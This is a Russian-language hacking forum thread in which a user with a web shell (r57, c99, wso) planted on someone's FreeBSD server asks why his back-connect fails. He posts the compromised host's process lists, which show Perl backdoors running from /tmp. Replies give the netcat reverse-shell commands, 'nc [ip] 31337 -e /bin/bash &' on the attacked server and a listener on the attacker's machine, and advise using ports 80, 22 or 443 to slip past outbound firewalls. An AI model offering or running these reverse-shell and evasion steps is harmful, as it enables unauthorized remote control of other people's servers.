Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   Не работает бэк-коннект (https://forum.antichat.xyz/showthread.php?t=125906)

InFlame 18.06.2009 19:36
Не работает бэк-коннект
 
Имеется сервер, на котором стоит FreeBSD 6.2 и залит шелл. При попытке создания бэк-коннект подключения ничего не происходит. Вот привожу листинг процессов:
Код:
$ ps aux
USER    PID %CPU %MEM  VSZ  RSS  TT  STAT STARTED      TIME COMMAND
root    10 70.1  0.0    0    8  ??  RL    4Jun09 15472:55.28 [idle]
root    928 14.6  0.3  3492  1080 con- S<    4Jun09 3139:23.89 /usr/local/sbin/s
root    592  0.8  0.2  1280  540  ??  SN    4Jun09 207:15.41 nfsd: server (nfs
root    25  0.1  0.0    0    8  ??  WL    4Jun09  83:27.62 [irq12: xl0]
www  57092  0.1  5.6 52660 17792  ??  S<  Wed07PM  5:04.52 /usr/local/sbin/h
root      0  0.0  0.0    0    0  ??  WLs  4Jun09  0:00.00 [swapper]
root      1  0.0  0.0  772    80  ??  SLs  4Jun09  0:00.82 /sbin/init --
root      2  0.0  0.0    0    8  ??  DL    4Jun09  1:40.67 [g_event]
root      3  0.0  0.0    0    8  ??  DL    4Jun09  24:00.74 [g_up]
root      4  0.0  0.0    0    8  ??  DL    4Jun09  26:26.75 [g_down]
root      5  0.0  0.0    0    8  ??  DL    4Jun09  0:00.00 [kqueue taskq]
root      6  0.0  0.0    0    8  ??  DL    4Jun09  0:00.00 [thread taskq]
root      7  0.0  0.0    0    8  ??  DL    4Jun09  0:00.00 [acpi_task_0]
root      8  0.0  0.0    0    8  ??  DL    4Jun09  0:00.00 [acpi_task_1]
root      9  0.0  0.0    0    8  ??  DL    4Jun09  0:00.00 [acpi_task_2]
root    11  0.0  0.0    0    8  ??  WL    4Jun09  42:59.98 [swi1: net]
root    12  0.0  0.0    0    8  ??  WL    4Jun09  52:20.37 [swi4: clock sio]
root    13  0.0  0.0    0    8  ??  WL    4Jun09  0:00.00 [swi3: vm]
root    14  0.0  0.0    0    8  ??  DL    4Jun09  9:09.58 [yarrow]
root    15  0.0  0.0    0    8  ??  WL    4Jun09  0:01.65 [swi6: task queue
root    16  0.0  0.0    0    8  ??  WL    4Jun09  0:00.00 [swi6: Giant task
root    17  0.0  0.0    0    8  ??  WL    4Jun09  0:00.00 [swi5: +]
root    18  0.0  0.0    0    8  ??  WL    4Jun09  0:00.00 [swi2: cambio]
root    19  0.0  0.0    0    8  ??  WL    4Jun09  20:52.93 [irq11: uhci0 uhc
root    20  0.0  0.0    0    8  ??  WL    4Jun09  0:20.06 [irq14: ata0]
root    21  0.0  0.0    0    8  ??  WL    4Jun09  2:07.00 [irq15: ata1]
root    22  0.0  0.0    0    8  ??  DL    4Jun09  0:00.14 [usb0]
root    23  0.0  0.0    0    8  ??  DL    4Jun09  0:00.00 [usbtask]
root    24  0.0  0.0    0    8  ??  DL    4Jun09  0:00.09 [usb1]
root    26  0.0  0.0    0    8  ??  WL    4Jun09  0:00.00 [irq10: atapci2]
root    27  0.0  0.0    0    8  ??  DL    4Jun09  0:08.47 [fdc0]
root    28  0.0  0.0    0    8  ??  WL    4Jun09  0:00.00 [swi0: sio]
root    29  0.0  0.0    0    8  ??  WL    4Jun09  0:00.00 [irq7: ppc0]
root    30  0.0  0.0    0    8  ??  WL    4Jun09  0:00.00 [irq1: atkbd0]
root    31  0.0  0.0    0    8  ??  DL    4Jun09  3:05.08 [pagedaemon]
root    32  0.0  0.0    0    8  ??  DL    4Jun09  0:00.00 [vmdaemon]
root    33  0.0  0.0    0    8  ??  RL    4Jun09  12:52.28 [pagezero]
root    34  0.0  0.0    0    8  ??  DL    4Jun09  0:36.46 [bufdaemon]
root    35  0.0  0.0    0    8  ??  DL    4Jun09  16:48.19 [syncer]
root    36  0.0  0.0    0    8  ??  DL    4Jun09  0:41.44 [vnlru]
root    37  0.0  0.0    0    8  ??  DL    4Jun09  1:42.51 [softdepflush]
root    38  0.0  0.0    0    8  ??  DL    4Jun09  2:42.96 [schedcpu]
root    150  0.0  0.1  1252  456  ??  Is    4Jun09  0:00.00 adjkerntz -i
root    450  0.0  0.0  528    16  ??  Is    4Jun09  0:00.01 /sbin/devd
root    516  0.0  0.2  1400  792  ??  Ss    4Jun09  0:17.77 /usr/sbin/syslogd
root    535  0.0  0.2  1504  624  ??  Ss    4Jun09  0:01.65 /usr/sbin/rpcbind
root    588  0.0  0.2  1484  624  ??  Is    4Jun09  0:00.03 /usr/sbin/mountd
root    590  0.0  0.2  1348  604  ??  INs  4Jun09  0:00.06 nfsd: master (nfs
root    593  0.0  0.2  1280  540  ??  IN    4Jun09  5:26.03 nfsd: server (nfs
root    594  0.0  0.2  1280  540  ??  IN    4Jun09  0:12.07 nfsd: server (nfs
root    596  0.0  0.2  1280  540  ??  IN    4Jun09  0:01.25 nfsd: server (nfs
root    597  0.0  0.2  1280  540  ??  IN    4Jun09  0:00.05 nfsd: server (nfs
root    598  0.0  0.2  1280  540  ??  IN    4Jun09  0:00.04 nfsd: server (nfs
root    599  0.0  0.2  1280  540  ??  IN    4Jun09  0:00.00 nfsd: server (nfs
root    600  0.0  0.2  1280  540  ??  IN    4Jun09  0:00.00 nfsd: server (nfs
root    601  0.0  0.2  1280  540  ??  IN    4Jun09  0:00.00 nfsd: server (nfs
root    602  0.0  0.2  1280  540  ??  IN    4Jun09  0:00.00 nfsd: server (nfs
root    615  0.0  0.3  3436  940  ??  Is    4Jun09  0:00.00 nginx: master pro
www    618  0.0  1.0  5180  3220  ??  R    4Jun09  35:25.44 nginx: worker pro
www    619  0.0  1.1  5548  3608  ??  S    4Jun09  35:27.79 nginx: worker pro
root    645  0.0  0.3  2920  1028  ??  Ss    4Jun09  1:19.20 /usr/sbin/ntpd -c
root    668  0.0  2.0 50296  6232  ??  S<s  4Jun09  1:01.64 /usr/local/sbin/h
www    724  0.0  6.7 53076 21500  ??  S<    4Jun09  66:54.11 /usr/local/sbin/h
www    725  0.0  6.3 52436 20228  ??  S<    4Jun09  67:48.22 /usr/local/sbin/h
www    726  0.0  6.7 53304 21268  ??  S<    4Jun09  66:50.82 /usr/local/sbin/h
www    727  0.0  6.6 53152 21056  ??  S<    4Jun09  66:09.73 /usr/local/sbin/h
www    728  0.0  6.6 53052 21024  ??  S<    4Jun09  66:24.33 /usr/local/sbin/h
root    729  0.0  0.3  3524  904  ??  Is    4Jun09  0:00.01 /usr/sbin/sshd
root    734  0.0  0.6  3484  1764  ??  Ss    4Jun09  1:00.91 sendmail: accepti
smmsp  740  0.0  0.4  3384  1392  ??  Is    4Jun09  0:00.95 sendmail: Queue r
root    746  0.0  0.2  1388  772  ??  Ss    4Jun09  0:21.24 /usr/sbin/cron -s
www    776  0.0  6.2 53060 19640  ??  I<    4Jun09  61:06.90 /usr/local/sbin/h
www    790  0.0  6.5 53328 20876  ??  S<    4Jun09  65:36.43 /usr/local/sbin/h
root    915  0.0  0.0    0    8  ??  WL    4Jun09 141:22.55 [irq5: sbc0]
www    1378  0.0  6.5 53088 20756  ??  S<    4Jun09  64:18.21 /usr/local/sbin/h
www    7277  0.0  6.1 55116 19580  ??  I<    4Jun09  61:36.82 /usr/local/sbin/h
www    7366  0.0  7.7 57360 24412  ??  S<    4Jun09  65:43.98 /usr/local/sbin/h
www  18828  0.0  0.3  1708  836  ??  S<    9:27PM  0:00.00 sh -c ps aux
www  18829  0.0  0.2  1500  784  ??  R<    9:27PM  0:00.00 ps aux
www  57090  0.0  0.0    0    0  ??  Z<  Wed07PM  0:00.00 <defunct>
www  57091  0.0  0.2  2984  736  ??  I<  Wed07PM  0:00.04 /usr/bin/perl /tm
www  59409  0.0  0.0    0    0  ??  Z<  Wed08PM  0:00.00 <defunct>
www  59410  0.0  0.2  2984  736  ??  I<  Wed08PM  0:00.04 /usr/bin/perl /tm
www  59687  0.0  5.5 52456 17636  ??  S<  Wed08PM  5:15.45 /usr/local/sbin/h
root  78996  0.0  0.3  1408  848  ??  I    4:30AM  0:00.00 cron: running job
root  79001  0.0  0.0    0    0  ??  Z    4:30AM  3:06.25 <defunct>
smmsp 80008  0.0  0.6  3392  2044  ??  Is    4:55AM  0:00.04 /usr/sbin/sendmai
mysql 80155  0.0  0.3  1728  820  ??  I<    4:58AM  0:00.02 /bin/sh /usr/loca
mysql 80176  0.0 11.1 59804 35460  ??  S<    4:58AM  57:50.36 /usr/local/libexe
root    966  0.0  0.2  1344  548  v0  Is+  4Jun09  0:00.01 /usr/libexec/gett
root    967  0.0  0.2  1344  548  v1  Is+  4Jun09  0:00.00 /usr/libexec/gett
root    968  0.0  0.2  1344  548  v2  Is+  4Jun09  0:00.00 /usr/libexec/gett
root    969  0.0  0.2  1344  548  v3  Is+  4Jun09  0:00.00 /usr/libexec/gett
root    970  0.0  0.2  1344  548  v4  Is+  4Jun09  0:00.00 /usr/libexec/gett
root    971  0.0  0.2  1344  548  v5  Is+  4Jun09  0:00.00 /usr/libexec/gett
root    972  0.0  0.2  1344  548  v6  Is+  4Jun09  0:00.00 /usr/libexec/gett
root    973  0.0  0.2  1344  548  v7  Is+  4Jun09  0:00.00 /usr/libexec/gett
Не подскажите, что за файрволл стоит?
Или какие ещё могут быть варианты подключения?

Spyder 18.06.2009 20:03
обрезаный у тебя ps -aux, ничё не видно
какой бекконект ты юзаешь и как запускаешь?

Tigger 18.06.2009 20:04
на 80ый порт

InFlame 18.06.2009 20:11
Запускал с трёх шеллов (r57, c99, wso2). В netcat прописывал nc -l -p [port]
Вроде всё правильно, так как с других серваков работает...
Код:
$ ps ax
  PID  TT  STAT      TIME COMMAND
    0  ??  WLs    0:00.00 [swapper]
    1  ??  ILs    0:00.83 /sbin/init --
    2  ??  DL    1:40.88 [g_event]
    3  ??  DL    24:02.45 [g_up]
    4  ??  DL    26:28.33 [g_down]
    5  ??  DL    0:00.00 [kqueue taskq]
    6  ??  DL    0:00.00 [thread taskq]
    7  ??  DL    0:00.00 [acpi_task_0]
    8  ??  DL    0:00.00 [acpi_task_1]
    9  ??  DL    0:00.00 [acpi_task_2]
  10  ??  RL  15503:01.11 [idle]
  11  ??  WL    43:05.34 [swi1: net]
  12  ??  WL    52:26.84 [swi4: clock sio]
  13  ??  WL    0:00.00 [swi3: vm]
  14  ??  DL    9:10.52 [yarrow]
  15  ??  WL    0:01.66 [swi6: task queue]
  16  ??  WL    0:00.00 [swi6: Giant taskq]
  17  ??  WL    0:00.00 [swi5: +]
  18  ??  WL    0:00.00 [swi2: cambio]
  19  ??  WL    20:54.40 [irq11: uhci0 uhci*]
  20  ??  WL    0:20.07 [irq14: ata0]
  21  ??  WL    2:07.07 [irq15: ata1]
  22  ??  DL    0:00.14 [usb0]
  23  ??  DL    0:00.00 [usbtask]
  24  ??  DL    0:00.09 [usb1]
  25  ??  WL    83:36.45 [irq12: xl0]
  26  ??  WL    0:00.00 [irq10: atapci2]
  27  ??  DL    0:08.49 [fdc0]
  28  ??  WL    0:00.00 [swi0: sio]
  29  ??  WL    0:00.00 [irq7: ppc0]
  30  ??  WL    0:00.00 [irq1: atkbd0]
  31  ??  DL    3:05.29 [pagedaemon]
  32  ??  DL    0:00.00 [vmdaemon]
  33  ??  RL    12:53.81 [pagezero]
  34  ??  DL    0:36.48 [bufdaemon]
  35  ??  DL    16:49.29 [syncer]
  36  ??  DL    0:41.47 [vnlru]
  37  ??  DL    1:42.61 [softdepflush]
  38  ??  DL    2:43.30 [schedcpu]
  150  ??  Is    0:00.00 adjkerntz -i
  450  ??  Is    0:00.01 /sbin/devd
  516  ??  Ss    0:17.82 /usr/sbin/syslogd -a 192.168.1.0/24
  535  ??  Is    0:01.65 /usr/sbin/rpcbind
  588  ??  Is    0:00.03 /usr/sbin/mountd -r
  590  ??  INs    0:00.06 nfsd: master (nfsd)
  592  ??  SN  207:34.15 nfsd: server (nfsd)
  593  ??  SN    5:26.25 nfsd: server (nfsd)
  594  ??  IN    0:12.07 nfsd: server (nfsd)
  596  ??  IN    0:01.25 nfsd: server (nfsd)
  597  ??  IN    0:00.05 nfsd: server (nfsd)
  598  ??  IN    0:00.04 nfsd: server (nfsd)
  599  ??  IN    0:00.00 nfsd: server (nfsd)
  600  ??  IN    0:00.00 nfsd: server (nfsd)
  601  ??  IN    0:00.00 nfsd: server (nfsd)
  602  ??  IN    0:00.00 nfsd: server (nfsd)
  615  ??  Is    0:00.00 nginx: master process /usr/local/sbin/nginx
  618  ??  R    35:31.99 nginx: worker process (nginx)
  619  ??  R    35:33.60 nginx: worker process (nginx)
  645  ??  Ss    1:19.36 /usr/sbin/ntpd -c /etc/ntp.conf -p /var/run/ntpd.pid
  668  ??  S<s    1:01.77 /usr/local/sbin/httpd
  724  ??  I<    67:04.26 /usr/local/sbin/httpd
  725  ??  S<    67:58.80 /usr/local/sbin/httpd
  726  ??  S<    66:59.74 /usr/local/sbin/httpd
  727  ??  S<    66:20.71 /usr/local/sbin/httpd
  728  ??  I<    66:39.11 /usr/local/sbin/httpd
  729  ??  Is    0:00.01 /usr/sbin/sshd
  734  ??  Ss    1:01.06 sendmail: accepting connections (sendmail)
  740  ??  Is    0:00.95 sendmail: Queue runner@00:30:00 for /var/spool/client
  746  ??  Is    0:21.29 /usr/sbin/cron -s
  776  ??  I<    61:06.90 /usr/local/sbin/httpd
  790  ??  I<    65:45.34 /usr/local/sbin/httpd
  915  ??  LL  141:39.81 [irq5: sbc0]
 1378  ??  S<    64:27.45 /usr/local/sbin/httpd
 7277  ??  I<    61:36.82 /usr/local/sbin/httpd
 7366  ??  S<    65:55.41 /usr/local/sbin/httpd
20604  ??  S<    0:00.00 sh -c ps ax
20605  ??  R<    0:00.00 ps ax
57090  ??  Z<    0:00.00 <defunct>
57091  ??  I<    0:00.04 /usr/bin/perl /tmp/bp.pl 31337 (perl5.8.8)
57092  ??  S<    5:21.52 /usr/local/sbin/httpd
59409  ??  Z<    0:00.00 <defunct>
59410  ??  I<    0:00.04 /usr/bin/perl /tmp/bdpl 11457 (perl5.8.8)
59687  ??  S<    5:26.34 /usr/local/sbin/httpd
78996  ??  I      0:00.00 cron: running job (cron)
79001  ??  Z      3:06.25 <defunct>
80008  ??  Is    0:00.04 /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
80155  ??  I<    0:00.02 /bin/sh /usr/local/bin/mysqld_safe --defaults-extra-f
80176  ??  S<    61:13.92 /usr/local/libexec/mysqld --defaults-extra-file=/var/
  966  v0  Is+    0:00.01 /usr/libexec/getty Pc ttyv0
  967  v1  Is+    0:00.00 /usr/libexec/getty Pc ttyv1
  968  v2  Is+    0:00.00 /usr/libexec/getty Pc ttyv2
  969  v3  Is+    0:00.00 /usr/libexec/getty Pc ttyv3
  970  v4  Is+    0:00.00 /usr/libexec/getty Pc ttyv4
  971  v5  Is+    0:00.00 /usr/libexec/getty Pc ttyv5
  972  v6  Is+    0:00.00 /usr/libexec/getty Pc ttyv6
  973  v7  Is+    0:00.00 /usr/libexec/getty Pc ttyv7
  928 con- S<  3145:49.36 /usr/local/sbin/sc_trans_freebsd /usr/local/etc/shout

Spyder 18.06.2009 20:21
для тебя и для всех остальных напишу в сотый раз
то что ты делаешь - это не бекконект. nc -l -p ты открываешь порт на сервере, как правило (90%) фаервол блокирует конекты на левые порта
Бекконет - это когда ты открываешь порт на своём компе (дедике) а на атакуемом сервере конектишься
для нетката у себя открываешь
nc -l -v -p 31337
на атакуемом сервере
nc [ip дедика] 31337 -e /bin/bash &

razb 18.06.2009 20:23
Сделай бк на 80, 22 etc. порты, а то исходящие на высокие порты iptables видимо блочит

InFlame 18.06.2009 20:31
Я знаю что такое бэкконнект ;) Я итак на своём компе порт слушаю (сайт в локалке). А с сервака ни на какие порты ко мне не хочет коннектиться.
А из приведённых выше процессов не видно какой файрволл стоит?

razb 18.06.2009 21:07
*linux -> iptables
*bsd -> ipfw

InFlame 19.06.2009 11:59
Почему тогда в процессах не видно ipfw?

$n@ke 19.06.2009 12:32
Если ты откроешь бекконект так, как написал паучок)) ,то все получится..главное что б у тебя был внешний ип. По своему опыту могу посоветывать порт 443, сомневаюсь что он у тебя занят)
вот только в данном случае советую запускать nc без "-e /bin/bash &"


Время: 09:03
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице